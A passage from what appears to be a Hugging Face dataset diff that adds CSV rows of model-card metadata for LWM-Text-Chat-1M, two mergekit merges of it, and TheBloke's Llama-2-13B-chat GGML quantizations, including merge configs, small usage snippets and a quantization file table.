lfs=None)""], ""spaces"": [""SakanaAI/EvoSDXL-JP"", ""ChenoAi/JuggernautXL-Playground"", ""SakanaAI/Evo-Ukiyoe"", ""SakanaAI/Evo-Nishikie"", ""andyaii/Images"", ""smartfeed/image2image"", ""RSPMetaAdmin/WebUIwControlNetwXL_Group1"", ""RSPMetaAdmin/WebUIwControlNetwXL_Group2"", ""qyoo/AID-v2"", ""tsqn/PhotoMaker-V2"", ""cbensimon/Evo-Ukiyoe"", ""tianaco/tianacomakethedot"", ""Adx13/v9_RDOhoto_Lightning_V1_BETA"", ""cocktailpeanut/EvoSDXL-JP"", ""benskibenski/JingleSharkStories"", ""charismao/RunDiffusion-Juggernaut-XL-v9"", ""Hello007007/RunDiffusion-Juggernaut-XL-v9"", ""jasoncharles/StoryDiffusion"", ""mberke11/content"", ""mberke11/story"", ""Raviii98/RunDiffusion-Juggernaut-XL-v9"", ""FlexTheAi/Flexstorydiff"", ""qvila/JuggernautXL-Playground"", ""jmartins94/RunDiffusion-Juggernaut-XL-v9"", ""jmartins94/TestRunDiffusion-Juggernaut-XL-v9"", ""FriedMain321/Juggernaut-XL-v9-Sandbox-V1"", ""sanjayxm/PuLiD-Flux"", ""henryas/storydiffusion"", ""sukma13/RunDiffusion-Juggernaut-XL-v9"", ""doublelotus/colorsteven"", ""farah6/RunDiffusion-Juggernaut-XL-v9"", ""iniapi/Images"", ""ebonyo/TTIforSLA""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-11 19:56:01+00:00"", ""cardData"": ""base_model: stabilityai/stable-diffusion-xl-base-1.0\nlanguage:\n- en\nlibrary_name: diffusers\nlicense: creativeml-openrail-m\npipeline_tag: text-to-image\ntags:\n- art\n- people\n- diffusion\n- Cinematic\n- Photography\n- Landscape\n- Interior\n- Food\n- Car\n- Wildlife\n- Architecture\nthumbnail: https://imagedelivery.net/siANnpeNAc_S2q1M3-eDrA/c200a026-c151-49c7-afbc-241fe943b300/padthumb"", ""transformersInfo"": null, ""_id"": ""65d270fff2da55d0a81123b7"", ""modelId"": ""RunDiffusion/Juggernaut-XL-v9"", ""usedStorage"": 27919048054}",0,,0,https://huggingface.co/zac/oliy,1,,0,,0,"ChenoAi/JuggernautXL-Playground, RSPMetaAdmin/WebUIwControlNetwXL_Group1, RSPMetaAdmin/WebUIwControlNetwXL_Group2, SakanaAI/Evo-Nishikie, SakanaAI/Evo-Ukiyoe, SakanaAI/EvoSDXL-JP, andyaii/Images, ebonyo/TTIforSLA, farah6/RunDiffusion-Juggernaut-XL-v9, huggingface/InferenceSupport/discussions/new?title=RunDiffusion/Juggernaut-XL-v9&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BRunDiffusion%2FJuggernaut-XL-v9%5D(%2FRunDiffusion%2FJuggernaut-XL-v9)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, qyoo/AID-v2, smartfeed/image2image, sukma13/RunDiffusion-Juggernaut-XL-v9",13
LWM-Text-Chat-1M_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
@@ -0,0 +1,128 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
LargeWorldModel/LWM-Text-Chat-1M,"---
inference: false
---

<br>
<br>

# LWM-Text-1M-Chat Model Card

## Model details

**Model type:**
LWM-Text-1M-Chat is an open-source model trained from LLaMA-2 on a subset of Books3 filtered data. It is an auto-regressive language model based on the transformer architecture.

**Model date:**
LWM-Text-1M-Chat was trained in December 2023.

**Paper or resources for more information:**
https://largeworldmodel.github.io/

## License
Llama 2 is licensed under the LLAMA 2 Community License,
Copyright (c) Meta Platforms, Inc. All Rights Reserved.

**Where to send questions or comments about the model:**
https://github.com/LargeWorldModel/lwm/issues

## Training dataset
- 800 subset of Books3 documents with 1M plus tokens","{""id"": ""LargeWorldModel/LWM-Text-Chat-1M"", ""author"": ""LargeWorldModel"", ""sha"": ""0598c443b02aeb1a1f9f6788e9af85ea762a452d"", ""last_modified"": ""2024-02-11 08:20:34+00:00"", ""created_at"": ""2024-02-07 05:36:19+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1817, ""downloads_all_time"": null, ""likes"": 174, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llama"", ""text-generation"", ""autotrain_compatible"", ""text-generation-inference"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""inference: false"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""pad_token"": null, ""bos_token"": {""__type"": ""AddedToken"", ""content"": ""<s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""eos_token"": {""__type"": ""AddedToken"", ""content"": ""</s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""unk_token"": {""__type"": ""AddedToken"", ""content"": ""<unk>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00001-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00002-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-02-11 08:20:34+00:00"", ""cardData"": ""inference: false"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65c316d3b911dda8cb6fadad"", ""modelId"": ""LargeWorldModel/LWM-Text-Chat-1M"", ""usedStorage"": 26954326092}",0,"https://huggingface.co/mergekit-community/mergekit-slerp-ozbsicw, https://huggingface.co/mergekit-community/LWM-14b-Text-Chat-1M",2,,0,"https://huggingface.co/mradermacher/LWM-Text-Chat-1M-GGUF, https://huggingface.co/mradermacher/LWM-Text-Chat-1M-i1-GGUF",2,"https://huggingface.co/mergekit-community/llama-world, 
https://huggingface.co/fradinho/world-llama2",2,huggingface/InferenceSupport/discussions/new?title=LargeWorldModel/LWM-Text-Chat-1M&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BLargeWorldModel%2FLWM-Text-Chat-1M%5D(%2FLargeWorldModel%2FLWM-Text-Chat-1M)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
mergekit-community/mergekit-slerp-ozbsicw,"---
base_model:
- LargeWorldModel/LWM-Text-Chat-1M
library_name: transformers
tags:
- mergekit
- merge

---
# merge

This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).

## Merge Details
### Merge Method

This model was merged using the SLERP merge method.

### Models Merged

The following models were included in the merge:
* [LargeWorldModel/LWM-Text-Chat-1M](https://huggingface.co/LargeWorldModel/LWM-Text-Chat-1M)

### Configuration

The following YAML configuration was used to produce this model:

```yaml
slices:
- sources:
  - model: LargeWorldModel/LWM-Text-Chat-1M
    layer_range:
    - 0
    - 32
  - model: LargeWorldModel/LWM-Text-Chat-1M
    layer_range:
    - 0
    - 32
merge_method: slerp
base_model: LargeWorldModel/LWM-Text-Chat-1M
parameters:
  t:
  - filter: self_attn
    value:
    - 0
    - 0.5
    - 0.3
    - 0.7
    - 1
  - filter: mlp
    value:
    - 1
    - 0.5
    - 0.7
    - 0.3
    - 0
  - value: 0.5
dtype: bfloat16
```
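In mergekit, a list of values such as the `t` curves above is a gradient that is interpolated across layer depth. A tiny numpy sketch of my reading of how the `self_attn` curve `[0, 0.5, 0.3, 0.7, 1]` expands over 32 layers (an illustration of the idea, not mergekit's exact code):

```python
import numpy as np

anchors = [0, 0.5, 0.3, 0.7, 1]  # the self_attn t-gradient from the YAML above
num_layers = 32
x = np.linspace(0, len(anchors) - 1, num_layers)
t_per_layer = np.interp(x, np.arange(len(anchors)), anchors)
print(np.round(t_per_layer, 2))  # interpolation weight used for SLERP at each layer
```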
","{""id"": ""mergekit-community/mergekit-slerp-ozbsicw"", ""author"": ""mergekit-community"", ""sha"": ""7b139d363aaf71594c14b315903cb2a520c34f8b"", ""last_modified"": ""2024-04-10 19:31:24+00:00"", ""created_at"": ""2024-04-10 19:29:43+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 7, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""llama"", ""text-generation"", ""mergekit"", ""merge"", ""base_model:LargeWorldModel/LWM-Text-Chat-1M"", ""base_model:finetune:LargeWorldModel/LWM-Text-Chat-1M"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": null, ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mergekit_config.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 6738415616}, ""total"": 6738415616}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-04-10 19:31:24+00:00"", ""cardData"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6616e8a77ed574892061b733"", ""modelId"": ""mergekit-community/mergekit-slerp-ozbsicw"", ""usedStorage"": 
13477364787}",1,,0,,0,https://huggingface.co/MaziyarPanahi/mergekit-slerp-ozbsicw-GGUF,1,,0,huggingface/InferenceSupport/discussions/new?title=mergekit-community/mergekit-slerp-ozbsicw&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmergekit-community%2Fmergekit-slerp-ozbsicw%5D(%2Fmergekit-community%2Fmergekit-slerp-ozbsicw)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 91 |
+
mergekit-community/LWM-14b-Text-Chat-1M,"---
|
| 92 |
+
base_model:
|
| 93 |
+
- LargeWorldModel/LWM-Text-Chat-1M
|
| 94 |
+
library_name: transformers
|
| 95 |
+
tags:
|
| 96 |
+
- mergekit
|
| 97 |
+
- merge
|
| 98 |
+
|
| 99 |
+
---
|
| 100 |
+
# merge
|
| 101 |
+
|
| 102 |
+
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
|
| 103 |
+
|
| 104 |
+
## Merge Details
|
| 105 |
+
### Merge Method
|
| 106 |
+
|
| 107 |
+
This model was merged using the linear [DARE](https://arxiv.org/abs/2311.03099) merge method using [LargeWorldModel/LWM-Text-Chat-1M](https://huggingface.co/LargeWorldModel/LWM-Text-Chat-1M) as a base.
|
| 108 |
+
|
| 109 |
+
### Models Merged
|
| 110 |
+
|
| 111 |
+
The following models were included in the merge:
|
| 112 |
+
|
| 113 |
+
|
| 114 |
+
### Configuration
|
| 115 |
+
|
| 116 |
+
The following YAML configuration was used to produce this model:
|
| 117 |
+
|
| 118 |
+
```yaml
|
| 119 |
+
merge_method: dare_linear
|
| 120 |
+
base_model: LargeWorldModel/LWM-Text-Chat-1M
|
| 121 |
+
models:
|
| 122 |
+
- model: LargeWorldModel/LWM-Text-Chat-1M
|
| 123 |
+
- model: LargeWorldModel/LWM-Text-Chat-1M
|
| 124 |
+
parameters:
|
| 125 |
+
weight: 1.0
|
| 126 |
+
dtype: float16
|
| 127 |
+
```
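As a usage note, here is a minimal sketch of loading the merged checkpoint with the *transformers* library; the repo id comes from this card, while the dtype and prompt are illustrative.

```py
# Minimal sketch: load and sample from the merged model.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "mergekit-community/LWM-14b-Text-Chat-1M"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(
    model_id, torch_dtype=torch.float16, device_map="auto"
)

inputs = tokenizer("Once upon a time,", return_tensors="pt").to(model.device)
print(tokenizer.decode(model.generate(**inputs, max_new_tokens=64)[0]))
```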
|
| 128 |
+
","{""id"": ""mergekit-community/LWM-14b-Text-Chat-1M"", ""author"": ""mergekit-community"", ""sha"": ""58c26d7dcd89051e8ae14a79ac80902140f98392"", ""last_modified"": ""2024-04-10 19:39:03+00:00"", ""created_at"": ""2024-04-10 19:37:28+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 3, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""llama"", ""text-generation"", ""mergekit"", ""merge"", ""arxiv:2311.03099"", ""base_model:LargeWorldModel/LWM-Text-Chat-1M"", ""base_model:finetune:LargeWorldModel/LWM-Text-Chat-1M"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": null, ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mergekit_config.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 6738415616}, ""total"": 6738415616}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-04-10 19:39:03+00:00"", ""cardData"": ""base_model:\n- LargeWorldModel/LWM-Text-Chat-1M\nlibrary_name: transformers\ntags:\n- mergekit\n- merge"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6616ea78260feb96942352d0"", ""modelId"": ""mergekit-community/LWM-14b-Text-Chat-1M"", ""usedStorage"": 13477364499}",1,,0,,0,"https://huggingface.co/MaziyarPanahi/LWM-14b-Text-Chat-1M-GGUF, 
https://huggingface.co/mradermacher/LWM-14b-Text-Chat-1M-GGUF",2,,0,huggingface/InferenceSupport/discussions/new?title=mergekit-community/LWM-14b-Text-Chat-1M&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmergekit-community%2FLWM-14b-Text-Chat-1M%5D(%2Fmergekit-community%2FLWM-14b-Text-Chat-1M)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
Llama-2-13B-chat-GGML_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv
ADDED
|
@@ -0,0 +1,299 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
TheBloke/Llama-2-13B-chat-GGML,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
license: other
|
| 6 |
+
tags:
|
| 7 |
+
- facebook
|
| 8 |
+
- meta
|
| 9 |
+
- pytorch
|
| 10 |
+
- llama
|
| 11 |
+
- llama-2
|
| 12 |
+
model_name: Llama 2 13B Chat
|
| 13 |
+
inference: false
|
| 14 |
+
model_creator: Meta Llama 2
|
| 15 |
+
model_link: https://huggingface.co/meta-llama/Llama-2-13b-chat-hf
|
| 16 |
+
model_type: llama
|
| 17 |
+
pipeline_tag: text-generation
|
| 18 |
+
quantized_by: TheBloke
|
| 19 |
+
base_model: meta-llama/Llama-2-13b-chat-hf
|
| 20 |
+
---
|
| 21 |
+
|
| 22 |
+
<!-- header start -->
|
| 23 |
+
<!-- 200823 -->
|
| 24 |
+
<div style=""width: auto; margin-left: auto; margin-right: auto"">
|
| 25 |
+
<img src=""https://i.imgur.com/EBdldam.jpg"" alt=""TheBlokeAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
|
| 26 |
+
</div>
|
| 27 |
+
<div style=""display: flex; justify-content: space-between; width: 100%;"">
|
| 28 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-start;"">
|
| 29 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://discord.gg/theblokeai"">Chat & support: TheBloke's Discord server</a></p>
|
| 30 |
+
</div>
|
| 31 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-end;"">
|
| 32 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://www.patreon.com/TheBlokeAI"">Want to contribute? TheBloke's Patreon page</a></p>
|
| 33 |
+
</div>
|
| 34 |
+
</div>
|
| 35 |
+
<div style=""text-align:center; margin-top: 0em; margin-bottom: 0em""><p style=""margin-top: 0.25em; margin-bottom: 0em;"">TheBloke's LLM work is generously supported by a grant from <a href=""https://a16z.com"">andreessen horowitz (a16z)</a></p></div>
|
| 36 |
+
<hr style=""margin-top: 1.0em; margin-bottom: 1.0em;"">
|
| 37 |
+
<!-- header end -->
|
| 38 |
+
|
| 39 |
+
# Llama 2 13B Chat - GGML
|
| 40 |
+
- Model creator: [Meta Llama 2](https://huggingface.co/meta-llama)
|
| 41 |
+
- Original model: [Llama 2 13B Chat](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf)
|
| 42 |
+
|
| 43 |
+
## Description
|
| 44 |
+
|
| 45 |
+
This repo contains GGML format model files for [Meta's Llama 2 13B-chat](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf).
|
| 46 |
+
|
| 47 |
+
### Important note regarding GGML files.
|
| 48 |
+
|
| 49 |
+
The GGML format has now been superseded by GGUF. As of August 21st 2023, [llama.cpp](https://github.com/ggerganov/llama.cpp) no longer supports GGML models. Third party clients and libraries are expected to still support it for a time, but many may also drop support.
|
| 50 |
+
|
| 51 |
+
Please use the GGUF models instead.
|
| 52 |
+
### About GGML
|
| 53 |
+
|
| 54 |
+
GGML files are for CPU + GPU inference using [llama.cpp](https://github.com/ggerganov/llama.cpp) and libraries and UIs which support this format, such as:
|
| 55 |
+
* [text-generation-webui](https://github.com/oobabooga/text-generation-webui), the most popular web UI. Supports NVidia CUDA GPU acceleration.
|
| 56 |
+
* [KoboldCpp](https://github.com/LostRuins/koboldcpp), a powerful GGML web UI with GPU acceleration on all platforms (CUDA and OpenCL). Especially good for story telling.
|
| 57 |
+
* [LM Studio](https://lmstudio.ai/), a fully featured local GUI with GPU acceleration on both Windows (NVidia and AMD), and macOS.
|
| 58 |
+
* [LoLLMS Web UI](https://github.com/ParisNeo/lollms-webui), a great web UI with CUDA GPU acceleration via the c_transformers backend.
|
| 59 |
+
* [ctransformers](https://github.com/marella/ctransformers), a Python library with GPU accel, LangChain support, and OpenAI-compatible AI server.
|
| 60 |
+
* [llama-cpp-python](https://github.com/abetlen/llama-cpp-python), a Python library with GPU accel, LangChain support, and OpenAI-compatible API server.
|
| 61 |
+
|
| 62 |
+
## Repositories available
|
| 63 |
+
|
| 64 |
+
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/Llama-2-13B-chat-GPTQ)
|
| 65 |
+
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGUF)
|
| 66 |
+
* [2, 3, 4, 5, 6 and 8-bit GGML models for CPU+GPU inference (deprecated)](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML)
|
| 67 |
+
* [Meta Llama 2's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/meta-llama/Llama-2-13B-chat-hf)
|
| 68 |
+
|
| 69 |
+
## Prompt template: Llama-2-Chat
|
| 70 |
+
|
| 71 |
+
```
|
| 72 |
+
[INST] <<SYS>>
|
| 73 |
+
You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature. If a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information.
|
| 74 |
+
<</SYS>>
|
| 75 |
+
{prompt}[/INST]
|
| 76 |
+
|
| 77 |
+
```
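To make the template concrete, here is a small illustrative helper that assembles a prompt in this format. The function name is ours, and the system text is abbreviated in the snippet; substitute the full system prompt from the template above.

```py
# Illustrative sketch: build a Llama-2-Chat prompt string.
DEFAULT_SYSTEM = (
    "You are a helpful, respectful and honest assistant. "
    "Always answer as helpfully as possible, while being safe."
    # ...abbreviated; use the full system text from the template above.
)

def build_prompt(user_message: str, system: str = DEFAULT_SYSTEM) -> str:
    return f"[INST] <<SYS>>\n{system}\n<</SYS>>\n{user_message}[/INST]"

print(build_prompt("Write a story about llamas"))
```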
|
| 78 |
+
|
| 79 |
+
<!-- compatibility_ggml start -->
|
| 80 |
+
## Compatibility
|
| 81 |
+
|
| 82 |
+
These quantised GGML files are compatible with llama.cpp between June 6th (commit `2d43387`) and August 21st 2023.
|
| 83 |
+
|
| 84 |
+
For support with latest llama.cpp, please use GGUF files instead.
|
| 85 |
+
|
| 86 |
+
The final llama.cpp commit with support for GGML was: [dadbed99e65252d79f81101a392d0d6497b86caa](https://github.com/ggerganov/llama.cpp/commit/dadbed99e65252d79f81101a392d0d6497b86caa)
|
| 87 |
+
|
| 88 |
+
As of August 23rd 2023 they are still compatible with all UIs, libraries and utilities which use GGML. This may change in the future.
|
| 89 |
+
|
| 90 |
+
## Explanation of the new k-quant methods
|
| 91 |
+
<details>
|
| 92 |
+
<summary>Click to see details</summary>
|
| 93 |
+
|
| 94 |
+
The new methods available are:
|
| 95 |
+
* GGML_TYPE_Q2_K - ""type-1"" 2-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Block scales and mins are quantized with 4 bits. This ends up effectively using 2.5625 bits per weight (bpw).
|
| 96 |
+
* GGML_TYPE_Q3_K - ""type-0"" 3-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Scales are quantized with 6 bits. This ends up using 3.4375 bpw.
|
| 97 |
+
* GGML_TYPE_Q4_K - ""type-1"" 4-bit quantization in super-blocks containing 8 blocks, each block having 32 weights. Scales and mins are quantized with 6 bits. This ends up using 4.5 bpw.
|
| 98 |
+
* GGML_TYPE_Q5_K - ""type-1"" 5-bit quantization. Same super-block structure as GGML_TYPE_Q4_K, resulting in 5.5 bpw.
|
| 99 |
+
* GGML_TYPE_Q6_K - ""type-0"" 6-bit quantization. Super-blocks with 16 blocks, each block having 16 weights. Scales are quantized with 8 bits. This ends up using 6.5625 bpw.
|
| 100 |
+
* GGML_TYPE_Q8_K - ""type-0"" 8-bit quantization. Only used for quantizing intermediate results. The difference to the existing Q8_0 is that the block size is 256. All 2-6 bit dot products are implemented for this quantization type.
|
| 101 |
+
|
| 102 |
+
Refer to the Provided Files table below to see what files use which methods, and how.
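As a rough sanity check, the nominal bpw figures predict the sizes in the Provided Files table fairly well for quant types that use a single k-quant for all tensors; mixed-type quants (q2_K, q3_K_M, q4_K_M, q5_K_M) come out larger than their nominal bpw. A back-of-envelope sketch, assuming a nominal 13.0e9 parameters:

```py
# Illustrative estimate: file size ≈ parameters × bits-per-weight / 8.
PARAMS = 13.0e9  # nominal Llama 2 13B parameter count

for name, bpw in [("q3_K_S", 3.4375), ("q4_K_S", 4.5),
                  ("q5_K_S", 5.5), ("q6_K", 6.5625)]:
    print(f"{name}: ~{PARAMS * bpw / 8 / 1e9:.2f} GB")
# Prints ~5.59, ~7.31, ~8.94, ~10.66 GB vs. 5.66, 7.37, 8.97, 10.68 GB
# in the table; the gap is metadata plus tensors kept at higher precision.
```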
|
| 103 |
+
</details>
|
| 104 |
+
<!-- compatibility_ggml end -->
|
| 105 |
+
|
| 106 |
+
## Provided files
|
| 107 |
+
|
| 108 |
+
| Name | Quant method | Bits | Size | Max RAM required | Use case |
|
| 109 |
+
| ---- | ---- | ---- | ---- | ---- | ----- |
|
| 110 |
+
| [llama-2-13b-chat.ggmlv3.q2_K.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q2_K.bin) | q2_K | 2 | 5.51 GB| 8.01 GB | New k-quant method. Uses GGML_TYPE_Q4_K for the attention.vw and feed_forward.w2 tensors, GGML_TYPE_Q2_K for the other tensors. |
|
| 111 |
+
| [llama-2-13b-chat.ggmlv3.q3_K_S.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q3_K_S.bin) | q3_K_S | 3 | 5.66 GB| 8.16 GB | New k-quant method. Uses GGML_TYPE_Q3_K for all tensors |
|
| 112 |
+
| [llama-2-13b-chat.ggmlv3.q3_K_M.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q3_K_M.bin) | q3_K_M | 3 | 6.31 GB| 8.81 GB | New k-quant method. Uses GGML_TYPE_Q4_K for the attention.wv, attention.wo, and feed_forward.w2 tensors, else GGML_TYPE_Q3_K |
|
| 113 |
+
